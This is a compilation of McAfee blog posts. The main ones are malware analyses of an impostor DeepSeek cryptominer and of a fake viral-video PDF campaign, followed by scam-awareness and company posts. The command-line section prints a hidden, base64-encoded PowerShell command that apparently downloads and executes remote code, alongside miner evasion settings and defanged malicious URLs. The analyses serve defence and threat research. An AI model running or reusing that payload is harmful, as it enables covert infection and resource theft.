        • –cpu-max-threads-hint=40 indicates the number of CPU threads used for mining. In this instance, 40% of the available threads will be used. This limit prevents the system from slowing down, and the mining will remain unnoticed. 
        • No GPU Flags: Here, the GPU is not used in mining, which prevents any GPU detection tools from flagging the mining process.
    • Upon further analysis, We noticed that it is used to mine *Monero Cryptocurrency, and it hasn’t been reported for any scams yet. 

    Figure 18: Wallet status for the captured wallet address 

     

    Why Monero? 

    The attacker purposely mines Monero Cryptocurrency, as it prioritizes anonymity, making it impossible to track the movements of funds. This makes it a popular coin by a number of crypto-miners 

     

    Appendix of Terms 

    Powershell 

    PowerShell is a cross-platform command-line shell and scripting language developed by Microsoft, primarily used for task automation and configuration management and streamlined administrative control across Windows, Linux, and macOS environments worldwide. 

    Cryptominer 

    A cryptominer is software or hardware that uses computing power to validate cryptocurrency transactions, secure decentralized networks, and earn digital currency rewards, often straining system resources and raising energy consumption. When used in the context of malware, it is unauthorized software that covertly uses infected devices to mine cryptocurrency, draining resources, slowing performance, increasing energy costs, and often remaining difficult to detect or remove. 

    Process Injection 

    This is a term used to describe a technique where malware injects and overwrites legitimate processes in memory, thereby modifying their behavior to run malicious code and bypassing security measures. The target processes are typically trusted processes. 

    C&C 

    C&C (Command and Control) is a communication channel used by attackers to remotely issue commands, coordinate activities, and data from compromised systems or networks. 

    Persistence 

    This term refers to the techniques that malware or an attacker uses to maintain long-term access to a compromised system, even after reboots, logouts, or security interventions. Persistence ensures that the malicious payload or backdoor remains active and ready to execute even if the system is restarted or the user tries to remove it. 

    Payload 

    In malware, a payload is the main malicious component delivered or executed once the infection occurs, enabling destructive activities such as data theft, system damage, resource hogging or unauthorized control and infiltration. 

    XMRig 

    XMRig is an open-source cryptocurrency mining software primarily used for mining Monero. It was originally developed as a legitimate tool for miners to efficiently utilize system resources to mine Monero using CPU and GPU power. However, due to its open-source nature and effectiveness, XMRig has become a popular tool for cryptominers. 

     

    Monero 

    Monero (XMR) is a privacy-focused cryptocurrency that prioritizes anonymity, security, and decentralization. Launched in April 2014, Monero is designed to provide untraceable and unlinkable transactions, making it difficult for outside parties to monitor or track the movement of funds on its blockchain. It operates on a decentralized, peer-to-peer network  but with enhanced privacy features. 

     

     

    Indicators of Compromise (IoCs) 

     

    The post Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users appeared first on McAfee Blog.

    The Dark Side of Clickbait: How Fake Video Links Deliver Malware

    By: McAfee Labs

    Authored By Sakshi Jaiswal 

    McAfee Labs recently observed a surge in phishing campaigns that use fake viral video links to trick users into downloading malware. The attack relies on social engineering, redirecting victims through multiple malicious websites before delivering the payload. Users are enticed with promises of exclusive content, ultimately leading them to fraudulent pages and deceptive download links.  

     

    Figure 1: Geo Heatmap showing McAfee customer encounters over the past 3 weeks. 

     

    Analysis 

    1. Upon executing the PDF file, the displayed page appears to be part of a phishing scam leveraging clickbait about a “viral video” to lure users into clicking suspicious links. The document contains blue hyperlinked text labeled as “Watch Click Here To Link (Full Viral Video Link)” and a deceptive video player graphic, giving the illusion of a playable video. 

    Figure 2: PDF Image 

     

    2. The user clicks on “Watch Click Here To Link (Full Viral Video Link)“, which redirects them to a webpage (gitb.org) displaying fake “viral video leaked” content, excessive ads, and fake notifications to lure users. It promotes adult content, gambling, and misleading download buttons, which are common indicators of phishing or malware traps. 

    Figure 3: Redirected Webpage 

     

    3. This further redirects to malicious URL “hxxps[:]//purecopperapp.monster/indexind.php?flow_id=107&aff_click_id=D-21356743-1737975550-34G123G137G124-AITLS2195&keyword=Yourfile&ip=115.118.240.109&sub=22697121&source=157764” 

    Figure 4: Redirected Webpage2 

     

    4. And then redirected to below URL: “hxxps[:]//savetitaniumapp.monster/?t=d6ebff4d554677320244f60589926b97” which presents a password-protected download link hosted on Mega.nz, requiring the user to manually copy and paste the URL. 

    Figure 5: Redirected Webpage with download link 

     

    5. Upon checking the URL, it displays a loading screen while preparing the malicious file for download and then shows a downloadable file named 91.78.127.175.zip with a size of 26.7 MB.  

     Figure 6: Screenshot of a ZIP file download from MEGA 

     

    6. Download is completed and stored in downloads folder 

    Figure 7: Zip file downloaded 

     

    7. A ZIP archive (91.78.127.175.zip, 26.7 MB) file contains a password protected .7z file with .png file containing the password. 

     

    Figure 8: Files inside ZIP archive 

     

    8. The extracted .7z archive contains setup.msi, which is the actual malware payload. 

    Figure 9: setup.msi file 

    Execution  

    Upon execution of setup.msi, the malware: 

    1. Displays a CAPTCHA image to deceive users. upon clicking “OK,” it begins dropping files in the %Roaming% directory. 

    Figure 10: Screenshot of CAPTCHA image 

     

    2. Drops files into the %Roaming% directory. 

    Figure 11: Dropped multiple files in %Roaming% 

     

    Process Execution & Command Lines 

    Process Tree 

    Figure 12: Process Tree 

     

    Command Lines 

    • C:\Windows\system32\msiexec.exe /V 
      • C:\Windows\syswow64\MsiExec.exe -Embedding B8B3D9D8EE75B04B6E518D4C8B1DA31A 
      • “C:\Users\****\AppData\Roaming\Toiap Corp Solus\Kowi SApp\UnRar.exe” x -p156427613t -o+ “C:\Users\****\AppData\Roaming\Toiap Corp Solus\Kowi SApp\iwhgjds.rar” “C:\Users\****\AppData\Roaming\Toiap Corp Solus\Kowi SApp\” 
        • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 
    • “C:\Users\****\AppData\Roaming\Toiap Corp Solus\Kowi SApp\obs-ffmpeg-mux.exe” 
      • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 
      • C:\Windows\SysWOW64\explorer.exe explorer.exe 
        • powershell -windowstyle hidden -e JABIAEkAcQB5AGkAIAA9ACAAKAAiAG4ALwBmAFUAOQArAG4AbQAxAHMANwBJADQAZgBiAFAANABvAGoAQgAwACsASABqADkAcwBTAGUAMAB2ADcAeAA3AHQARABXAGwAWgBEAGwAOQB0AGYAeAAwAHUALwB1ADYAUABiAFgANgBkADIASQA4AGUAVAB0ADMAZQBPAE0AawBPAFgAaABsAHUAUABSADYATQBEADAALwA4AFAAdQAxAHQAYgBpAC8AZQBtAFgAagBOAFEAPQAiACkACgAkAGcATwBsAEoASgAgAD0AIAAkAEgASQBxAHkAaQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAIgAsACAAIgBhACIAKQAKACQAaQByAEIAQwB6ACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABnAE8AbABKAEoAKQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfACAALQBiAHgAbwByACAAMQA2ADcAfQAKACQAaABRAHMAUAA0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAHIAQgBDAHoAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAIgAsACAAIgBhACIAKQAKACQAZgBvAEgAWgBLACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABoAFEAcwBQADQAKQAKACQAZABsADgARAAxACAAPQAgAFsAYgB5AHQAZQBbAF0AXQAoADEANQAyACwAIAAxADQAMwAsACAAMQAyADMALAAgADYAOAAsACAAMQAyADEAKQA7AAoAJABoAG4ATgBzAGoAIAA9ACAAMAA7AAoAJABmAFcARQBGAEoAIAA9ACAAJABmAG8ASABaAEsAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAKACQAXwAgAC0AYgB4AG8AcgAgACQAZABsADgARAAxAFsAJABoAG4ATgBzAGoAKwArAF0AOwAKAGkAZgAgACgAJABoAG4ATgBzAGoAIAAtAGcAZQAgACQAZABsADgARAAxAC4ATABlAG4AZwB0AGgAKQAgAHsACgAkAGgAbgBOAHMAagAgAD0AIAAwAAoAfQAKAH0ACgAKACQAdABzAHUANwB4AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7AAoAJABXAHcAdgBZAHUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGYAVwBFAEYASgApADsACgAkAEEAdQBDAFoASgA9ACQAdABzAHUANwB4AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABXAHcAdgBZAHUAKQA7AAoAJABaAEEAUQBvADkAIAA9ACAAJABBAHUAQwBaAEoALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIAbAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAqACIALAAgACIAZAAiACkALgBSAGUAcABsAGEAYwBlACgAIgBgACIAIgAsACAAIgBUACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACcAIgAsACAAIgBIACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiADsAIgAsACAAIgBGACIAKQAKACQAQQBRAGkAUwBmACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABaAEEAUQBvADkAKQAKAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABBAFEAaQBTAGYAKQAgAHwAIABpAGUAeAAKAA== 
          • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 
        • C:\Windows\system32\WerFault.exe -u -p 3064 -s 316 
    • “C:\Users\****\AppData\Roaming\Toiap Corp Solus\Kowi SApp\createdump.exe” 
        • \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 
    • C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc 
    • C:\Windows\System32\svchost.exe -k WerSvcGroup 
      • C:\Windows\system32\WerFault.exe -pss -s 432 -p 3064 -ip 3064 

     

    Detection & Coverage 

    McAfee intercepts and blocks this infection chain at multiple stages. 

    URL blocking of the fake video pages. 

    Figure 13: McAfee Blocking URL 

     

    Figure 14: McAfee PDF file Detection 

     

    Conclusion and Recommendations 

    This campaign highlights how cybercriminals exploit social engineering tactics and clickbait content to distribute malware. Users should remain cautious when encountering suspicious video links. To stay protected against phishing attacks and malware infections, McAfee recommends: 

    1. Avoid clicking on suspicious links in emails, social media posts, or messages that promise exclusive or leaked content. 
    2. Verify file sources before downloading by checking domain legitimacy and scanning files with McAfee security solutions. 
    3. Enable real-time security updates to ensure endpoint protection remains updated against the latest threats. 
    4. Utilize McAfee Web Protection to block access to known phishing and malware-hosting websites. 

     

    Indicators of Compromise (IoCs) 

    Sha256 Hash List 

    • 00001c98e08fa4d7f4924bd1c375149104bd4f1981cef604755d34ca225f2ce1 
    • 000e75287631a93264d11fc2b773c61992664277386f45fa19897a095e6a7c81 
    • 52c606609dab25cdd43f831140d7f296d89f9f979e00918f712018e8cc1b6750 
    • 00539e997eb6ae5f6f7cb050c3486a6dfb901b1268c13bdfeeec5b776bf81c1e 
    • 0047d7a61fd9279c9fba9a604ed892e4ec9d732b10c6562aab1938486a538b7d 

     

    Redirecting Websites 

    • hxxps[:]//gitb.org/watch-click/?=archive 
    • hxxps[:]//viralxgo.com/watch-full-video/
    • hxxps[:]//purecopperapp.monster/indexind.php?flow_id=107&aff_click_id=D-21356743-1737975550-34G123G137G124-AITLS2195&keyword=Yourfile&ip=115.118.240.109&sub=22697121&source=157764 
    • hxxps[:]//wlanpremiumapp.monster/indexind.php?flow_id=107&aff_click_id=D-21356743-1739353595-34G134G64G208-YBUVA1634&keyword=Yourfile&ip=115.118.240.109&sub=22697095&source=157764 
    • hxxps[:]//savetitaniumapp.monster/?t=d6ebff4d554677320244f60589926b97 
    • hxxps[:]//loadpremiumapp.monster/?t=74fddba44e47538821a2796e12191868 
    • hxxps[:]//mega.nz/file/JG9nHAjQ#xYoJHxAy_mP1KlZC-m2P-UgPzXiHiH6XA0QQn62sseY 

     

    The post The Dark Side of Clickbait: How Fake Video Links Deliver Malware appeared first on McAfee Blog.

    McAfee Named One of America’s Best Employers by Forbes

    By: McAfee

    We’re thrilled to share some exciting news—McAfee has been recognized on Forbes’ prestigious list of America’s Best Midsize Employers for 2025! This recognition is a testament to our incredible employees, whose passion and commitment make McAfee not just an industry leader, but also a truly exceptional place to work. 

    “A great workplace isn’t just about what we do—it’s about who we are and the purpose we share,” said Justin Hastings, Chief People Officer at McAfee. “This award reflects our dedication to fostering an environment where employees feel valued, empowered, and connected. Whether through our innovation, career development, or our strong sense of community, we strive to make McAfee a place where talent thrives, driven by our mission to keep our customers safe in their digital lives.”

    Forbes and Statista, a global data and business intelligence firm, compiled this list based on feedback from over 217,000 employees across various industries in the U.S. The ranking considers both direct feedback from McAfee team members and public perceptions of our workplace culture, with personal employee experiences carrying the most weight. 

    What This Means for McAfee 

    At McAfee, we believe that a great workplace isn’t just about the work—it’s about the people. This recognition underscores our ongoing commitment to fostering a culture where employees feel valued, empowered, and inspired. Whether it’s through innovative projects, professional growth opportunities, or a strong sense of community, we strive to make McAfee a place where talent thrives. 

    Our spot within the top 300 of 500 companies, shows that our collective dedication to excellence, inclusivity, and collaboration is making an impact. 

    A Big Thank You to Our Team 

    This achievement wouldn’t be possible without our amazing employees who bring their best every day. Your contributions drive our success, and this recognition is as much yours as it is McAfee’s. 

    As we continue to push boundaries in cybersecurity, we remain committed to ensuring McAfee is a company where talent grows, ideas flourish, and people love coming to work. 

    Join us at McAfee   

    It’s an exciting time to be part of Team McAfee! As we continue to grow and innovate, we’re always looking for passionate individuals who want to help create a safer online world.  

    If you’re looking for a workplace where your ideas matter, your contributions are valued, and you can thrive in a dynamic, mission-driven environment, we’d love to have you on board. Explore opportunities to join us today!  

    The post McAfee Named One of America’s Best Employers by Forbes appeared first on McAfee Blog.

    Super Scams – Beat the Online Scammers Who Want to Sack Your Big Game

    By: McAfee

    Cybercriminals will always try to cash in on a good thing, and football is no exception. Online scammers are ramping up for the big game with all types of schemes designed to rip you off and steal your personal info—but you have several ways you can beat them at their game.  

    Like shopping holidays, tax season, and even back-to-school time, scammers take advantage of annual events that get people searching for deals and information online. You can include big games and tournaments in that list too. 

    Specific to this big game, you can count on several types of scams to rear their heads this time of year—ticket scams, merchandise scams, betting scams, and phony sweepstakes as well. They’re all in the mix, and they’re all avoidable. Here, we’ll break them down. 

    Keep an eye out for ticket scams. 

    As of two weeks out, tickets for the big game on the official ticketing website were going for $6,000 or so, and that was for the so-called “cheap seats.” Premium seats in the lower bowl 50-yard line, sold by verified resellers, were listed at $20,000 a pop or higher.  

    While the game tickets are now 100% mobile, that hasn’t prevented scammers from trying to pass off phony tickets as the real deal. They’ll hawk those counterfeits in plenty of places online, sometimes in sites like your friendly neighborhood Craigslist.  

    So if you’re in the market for tickets, there are certainly a few things to look out for: 

    • First off, the safest bet is to purchase tickets through the official marketplaces of the NFL with a 100% ticket guarantee. 
    • If someone is selling physical tickets, it’s a scam. As mentioned above, tickets are now 100% mobile. 
    • If you see so-called deals for tickets that are going well below the current rate, you can practically bet that’s a scam as well. 
    • Another sign of a scam, is someone is asking for payment by a payment app like Venmo or by wire transfer or even crypto. These payment methods work like cash, meaning that if you pay a scammer with them, your money is good as gone.  

    Look out for online merch scams. 

    If you plan on enjoying the game closer to home, you may be in the market for some merch—a hat, a jersey, a tee, or maybe some new mugs for entertaining when you host the game at your place. With all the hype around the game, out will come scammers who set up bogus online stores. They’ll advertise items for sale but won’t deliver—leaving you a few dollars lighter and the scammers with your payment information, which they can use on their own for identity fraud. 

    You can shop safely with a few straightforward steps: 

    Stick with known, legitimate retailers online for your merch. 

    This is a great one to start with. Directly typing in the correct address for reputable online stores and retailers is a prime way to avoid scammers online. In the case of retailers that you don’t know much about, the U.S. Better Business Bureau (BBB) asks shoppers to do their research and make sure that retailer has a good reputation. The BBB makes that easier with a listing of retailers you can search simply by typing in their name. 

    If you feel like doing extra sleuthing, look up the address of the website and see when it was launched. A visit to the Internet Corporation for Assigned Names and Numbers (ICANN) at ICANN.org gives you the option to search a web address and see when it was launched, along with other information about who registered it. While a recently launched site is not an indicator of a scam site alone, sites with limited track records may give you pause if you want to shop there—particularly if there’s a chance it was just propped up by a scammer.  

    Look for the lock icon in your browser when you shop. 

    Secure websites begin their address with “https,” not just “http.” That extra “s” in stands for “secure,” which means that it uses a secure protocol for transmitting sensitive info like passwords, credit card numbers, and the like over the internet. It often appears as a little padlock icon in the address bar of your browser, so double-check for that. If you don’t see that it’s secure, it’s best to avoid making purchases on that website. 

    Use a secure payment method other than your debit card. 

    Credit cards are a good way to go. One reason why is the Fair Credit Billing Act, which offers protection against fraudulent charges on credit cards by giving you the right to dispute charges over $50 for goods and services that were never delivered or otherwise billed incorrectly. Your credit card companies may have their own policies that improve upon the Fair Credit Billing Act as well. Debit cards don’t get the same protection under the Act.  

    Get online protection. 

    Comprehensive online protection software will defend against the latest virus, malware, spyware, and ransomware attacks plus further protect your privacy and identity. In addition to this, it can also provide strong password protection by generating and automatically storing complex passwords to keep your credentials safer from hackers and crooks who may try to force their way into your accounts. And, specific to the scams floating around this time of year, online protection can help prevent you from clicking links to known or suspected malicious sites. 

    Placing a bet? Make it a safe(r) one. 

    It’s hard to watch sports these days without odds and stat lines popping up onto the screen, along with a fair share of ads that promote online betting. If you’re thinking about making things interesting with some betting, keep a few things in mind: 

    • As of January 2023, online betting is live and legal in some form across 32 states in the U.S., with “live and legal” meaning that sports betting is legally offered through retail and/or online sportsbooks. Where you can bet and how you can bet varies from state to state, and this interactive map can show you the details for yours. 
    • Stick with the legal mobile betting apps and sites in your state, which you can also view via the interactive map linked above. Yet it shouldn’t come as a surprise that scam betting sites have cropped up. According to the Better Business Bureau (BBB), they’ve received plenty of complaints. “You place a bet, and, at first, everything seems normal. But as soon as you try to cash out your winnings, you find you can’t withdraw a cent. Scammers will make up various excuses,” says the BBB. 
    • Also, read the fine print on those promo offers that betting sites and apps advertise. Chances are you’ve seen the commercials with all manner of special sign-up bonuses. The BBB advises people to closely read the terms and conditions behind those offers. For one, “Gambling companies can restrict a user’s activity,” meaning that they can freeze accounts and the funds associated with them based on their terms and conditions. Also, the BBB cautions people about those promo offers that are often heavily advertised, “[L]ike any sales pitch, these can be deceptive. Be sure to read the fine print carefully.”  
    • In addition to choosing a state-approved option, check out the organization’s BBB listing at BBB.org. Here you can get a snapshot of their BBB rating, complaints registered against them, and the organization’s response to those complaints if they have chosen to respond. Doing a little reading here can be enlightening. It can show you what complaints typically arise, and how the organization has historically addressed them. 

    Watch out for phony sweepstakes and prizes too. 

    As it is every year, you’ll see kinds of sweepstakes and giveaways leading up to the game, plenty of them legitimate. Yet as they do, scammers will try and blend in by rolling out their own bogus promotions. Their aim: to part you from your cash or even your personal information. 

    A quick way to sniff out these scams is to take a close look at the promotion. For example, if it asks you to provide your bank information to send you your prize money, count on it being a scam. Likewise, if the promotion asks you to pay to claim a prize in some form or other, it’s also likely someone’s trying to scam you.  

    In all, steer clear of promotions that ask something for something in return, particularly if it’s your money or personal information. 

    Enjoy your big game. 

    As it is of late, all kinds of scams will try to glom onto the big game this year. And some of the best advice for avoiding them is not to give in to the hype. Scammers prey on scarcity, a sense of urgency, and keyed-up emotions in general. Their hope is that these things may make you less critical and more likely to overlook things that would otherwise seem sketchy or too good to be true. Staying focused as you shop, place a wager, or otherwise look to round out your enjoyment of the big game is some of your absolute best defense against scammers right now, and any time. 

    The post Super Scams – Beat the Online Scammers Who Want to Sack Your Big Game appeared first on McAfee Blog.

    Introducing Personal Data Cleanup

    By: McAfee

    We’re excited to announce the release of McAfee’s Personal Data Cleanup, a new feature that finds and removes your personal info from data brokers and people search sites. Now, you can feel more confident by removing personal info from data broker sites and keeping it from being collected, sold, and used to: advertise products to you, fill your email box with spam, and can even give criminals the info they need to steal your identity. Let’s look at why we’re offering McAfee Personal Data Cleanup, how it protects your privacy, and why it’s a great addition to the online protection we already offer. 

    Does the cost of a connected life have to be your privacy?

    There’s so much to enjoy when you live a connected life – free email, online stores that remember what you like, social media that connects you to friends and influencers. It’s a world of convenience, opportunity, and incredible content. It’s also a world where your data is constantly collected.  

    “Wait. Did you say my data?” 

    That’s right, companies are collecting your personal data. They’re called data brokers and they make money by selling information that specifically identifies you, like an email address. They sell this information to marketers looking to target you with ads. Criminals can also use it to build profiles in service of stealing your identity and accessing your accounts. This activity takes place behind the scenes and often without consumers’ knowledge.  There are also data brokers known as people search sites that compile and sell info like home addresses, emails, phones, court records, employment info, and more. These websites give identity thieves, hackers, stalkers, and other malicious actors easy access to your info. Regardless of how your data is being used, it’s clear that these days a more connected life often comes at the cost of your privacy.  

    Consumers are clamoring for more privacy online 

    In a recent survey of McAfee customers, we found that 59% have become more protective of their personal data over the past six months. And it’s no wonder. Over the past two years, trends like telehealth, remote working, and increased usage of online shopping and financial services have meant that more of your time is being spent online. Unsurprisingly, more personal data is being made available in the process. This leads us to the most alarming finding of our survey – 95% of consumers whose personal information ends up on data broker sites had it collected without their consent.  

     

    Free to enjoy privacy online with McAfee’s Personal Data Cleanup 

    We created Personal Data Cleanup to make it easy for you to take back your privacy online. McAfee’s Personal Data Cleanup regularly scans the riskiest data broker sites for info like your home address, date of birth, and names of relatives. After showing where we found your data, you can either remove it yourself or we will work on your behalf to remove it. Here’s how it works: 

    • Set up 
      • Input your name, date of birth, and home address. 
    • Scan:  
      • We scan this against some of the riskiest data broker sites 
    • Review 
      • Within minutes, we’ll show you where we found your personal info, and what info the sites have. 
    • Remove 
      • You can manually go to each site and request that your data be removed OR upgrade to have McAfee manage the removal process on your behalf. 
    • Ongoing 
      • Your info can reappear as data brokers continually collect data. To ensure ongoing protection, Personal Data Cleanup enables regular scanning so it can be removed. 

    Start using McAfee’s Personal Data Cleanup right now 

    Ready to take back your personal info online? Personal Data Cleanup is available immediately with most of our online protection plans. If you have an eligible subscription, you can start using this new feature through McAfee Protection Center, or you can get McAfee online protection here.

    The post Introducing Personal Data Cleanup appeared first on McAfee Blog.

    Rising Scams in India: Building Awareness and Prevention

    By: McAfee Labs

    Authored by Anuradha, Sakshi Jaiswal 

    In 2024, scams in India have continued to evolve, leveraging sophisticated methods and technology to exploit unsuspecting individuals. These fraudulent activities target people across demographics, causing financial losses and emotional distress. This blog highlights some of the most prevalent scams this year, how they operate, some real-world scenarios, tips to stay vigilant and what steps to be taken if you become a victim.

    This blog covers the following scams:

    1. WhatsApp Scam
    2. Instant Loan Scam
    3. Voice Cloning Scam
    4. Credit Card Scam
    5. Fake Delivery Scam
    6. Digital Arrest Scam

    1.WhatsApp Scam:

    Scam Tactics:

    Fraudsters on WhatsApp employ deceptive tactics to steal personal information, financial data, or gain unauthorized access to accounts. Common tactics include:

    • Phishing Links: Messages with fake links mimicking trusted organizations, urging users to verify their accounts or claim rewards.
      Example: “Your account will be deactivated! Click here to verify your number now.”

    Case 1: In the figure below, a user is being deceived by a message originating from the +244 country code, assigned to Angola. The message offers an unrealistic investment opportunity promising a high return in just four days, which is a common scam tactic. It uses pressure and informal language, along with a link for immediate action.

     

    Case 2: In the figure below, a user is being deceived by a message originating from the +261 country code, assigned to Madagascar. The message claims that you have been hired and asks you to click a link to view the offer or contact the sender which is a scam.

    • Impersonation: Scammers hijack or mimic contacts to ask for urgent financial help.
      Example: “Hey, it’s me! I lost my wallet. Can you send me ₹5,000?”
    • Fake Job Offers: Messages promising high earnings from home to lure victims into scams.
      Example: “Earn ₹10,000 daily! Contact us to start now!”

    Case 3: In the figure below, a user is being deceived by a message originating from the +91 country code, assigned to India. Scammers may contact you, posing as representatives of a legitimate company, offering a job opportunity. The recruiter offers an unrealistic daily income (INR 2000–8000) for vague tasks like searching keywords, which is suspicious. Despite requests, they fail to provide official company details or an email ID, raising credibility concerns. They also ask for personal information prematurely, a common red flag.

    Case 4: In the figure below, a user is being deceived by a message originating from the +84 country code, assigned to Vietnam. The offer to earn money by watching a video for just a few seconds and providing a screenshot is a common tactic used by scammers to exploit individuals. They may use the link to gather personal information, or your action could lead to phishing attempts.

    Case 5: In the figure below, a user is being misled by a message originating from the country codes +91, +963, and +27, corresponding to India, Syria, and South Africa, respectively. The message claims to offer a part-time job with a high salary for minimal work, which is a common tactic used by scammers to lure individuals. The use of popular names like “Amazon” and promises of easy money are red flags. The link provided might lead to phishing attempts or data theft. It’s important not to click on any links, share personal details, or respond to such unsolicited offers.

    Case 6: The messages encourage you to post fake 5-star reviews for businesses in exchange for a small payment, which is unethical and often illegal. Scammers use such tactics to manipulate online ratings, and the provided links could lead to phishing sites or malware. Avoid engaging with these messages, clicking on the links, or participating in such activities.

     

    • Lottery/Giveaway Fraud: Claims of winning a prize, requiring advance payments or sharing bank details.
      Example: “Congrats! You’ve won ₹1,00,000 in the WhatsApp Lottery. Share your bank details to claim.”
    • Malware Links: Messages containing harmful links disguised as videos, photos, or documents, designed to infect your device.
      Example: “Look at this amazing video! [malicious link]”
    • Wedding Invite Scam: Fraudsters send fake wedding invitations with malicious links. Clicking the links can download .apk file and install malware, steal personal or financial information, or gain unauthorized access to a WhatsApp account. Always verify the sender and avoid clicking suspicious links.
    • Verification Code Theft: Fraudsters trick users into sharing their WhatsApp verification codes, enabling account hijacking.

    How to Identify WhatsApp Scams:

    • Unsolicited Messages: Be cautious of unexpected messages, especially from unknown numbers.
    • Sense of Urgency: Scammers often create panic, pressuring you to act quickly.
    • Poor Language: Messages may contain spelling or grammatical errors, indicating they are not from legitimate sources.
    • Generic Greetings: Messages lack personalization, such as using “Dear Customer” instead of your name.
    • Too Good to Be True Offers: High-value rewards, jobs, or opportunities with no clear justification.
    • Suspicious Links: Shortened or unrecognizable URLs that redirect to fake websites.

    Impact:

    • Financial Loss: Victims may transfer money or share bank details, resulting in unauthorized transactions.
    • Identity Theft: Personal information can be misused for fraudulent activities.
    • Account Hijacking: Losing access to your WhatsApp account if verification codes are shared.
    • Privacy Breach: Sensitive data from your chats or device can be exploited.
    • Emotional Distress: Scams can cause stress, anxiety, and a loss of trust in technology or personal relationships.

    Prevention:

    • Verify Sender Identity: Confirm any request for money or sensitive information directly with the person through alternate means.
    • Avoid Clicking on Links: Always verify the legitimacy of links before clicking.
    • Enable Two-Step Verification: Secure your WhatsApp account with a PIN for added protection.
    • Restrict Profile Access: Adjust privacy settings to limit who can view your profile photo, status, and other details.
    • Be Cautious of Urgent Requests: Fraudulent messages often pressure you to act immediately. Take a moment to evaluate.
    • Check Authenticity: Research offers or schemes mentioned in messages to ensure they are legitimate.
    • Report and Block: Use WhatsApp’s “Report” feature to flag suspicious contacts and block them.

    2. Instant Loan Scam:

    Scam Tactics:

    • Fake Loan Apps or Websites: Scammers create fake loan apps or websites that appear legitimate. They promise easy loans with minimal requirements and fast disbursements.
    • Personal Information Harvesting: To apply for these loans, victims are asked to provide sensitive personal information, such as bank details, Aadhaar numbers, and other financial information.
    • Advance Fee Demand: Once the application is submitted, the scammers claim that an advance fee, processing charge, or security deposit is required before the loan can be disbursed.
    • Excessive Interest Rates: If the loan is approved, it often comes with extraordinarily high interest rates or hidden charges, leading the borrower into a debt trap.
    • Threats and Harassment: If the victim is unable to repay the loan, scammers may use aggressive tactics, including blackmail, threats of legal action, or public humiliation to force repayment.

    How to Identify Instant Loan Scam:

    • Unsolicited Offers: Be wary of loan offers you receive unexpectedly via calls, emails, or ads.
    • Too Good to Be True: If the loan offer seems unusually easy, with little paperwork or no credit checks, it’s likely a scam.
    • Advance Fees: Genuine lenders never ask for upfront payments before disbursing a loan.
    • Excessive Interest Rates: Watch out for loans with outrageously high interest rates or hidden fees.
    • Unprofessional Communication: Look for red flags like poorly written messages or vague, generic offers.
    • Pressure to Act Fast: Scammers often create urgency, pushing you to make quick decisions without proper verification.

    Impact:

    • Financial Losses: Victims are often tricked into paying exorbitant fees, with no loan ever being disbursed, or receiving loans with unaffordable repayment terms.
    • Emotional Distress: The constant harassment, along with the fear of financial ruin, leads to significant emotional and mental stress for victims.

    Prevention:

    • Verify Loan Providers: Always check the legitimacy of loan apps or websites by reading reviews and verifying their authenticity through trusted sources.
    • Avoid Sharing Sensitive Information: Never share personal or financial information unless you’re sure of the legitimacy of the platform.
    • Report Suspicious Platforms: If you come across a suspicious loan provider, report it to relevant authorities like the Reserve Bank of India (RBI) or consumer protection agencies.
    • Be Cautious with Quick Loans: Instant loans with no credit checks or paperwork should raise immediate suspicion. Always read the terms and conditions carefully.

     

    3. Voice-Cloning Scam:

    Voice-cloning scams use advanced AI technology to replicate the voices of familiar people, such as friends, family members, or colleagues, to manipulate victims into transferring money or providing sensitive information.

    Scam Tactics:

    • Impersonating Trusted Voices: Scammers use voice-cloning technology to mimic the voice of a person the victim knows, often creating a sense of trust and urgency.
    • Urgent Requests for Money: The cloned voice typically claim an emergency, such as needing money for medical expenses or legal issues, pressuring the victim to act quickly.
    • Sensitive Information Requests: Scammers may also use voice cloning to trick victims into revealing personal information, passwords, or financial details.

    How to Identify AI Voice-Cloning Scams:

    • Verify the Country Code: Check the country code of the incoming call to ensure it matches the expected location.
    • Contact the Person Directly: If possible, reach out to the person through another method to confirm the authenticity of the call.
    • Notice Changes in Speech Tone or Patterns: Be alert to any changes in the speaker’s tone or unnatural speech patterns that may indicate a scam.

    Impact:

    • Financial Losses
    • Emotional and Psychological Stress

    Prevention

    • Verify the Caller: Always verify the caller’s identity through an alternative channel before proceeding with any action.
    • Be Skeptical of Urgency: Take your time and evaluate urgent requests carefully, especially those involving money.
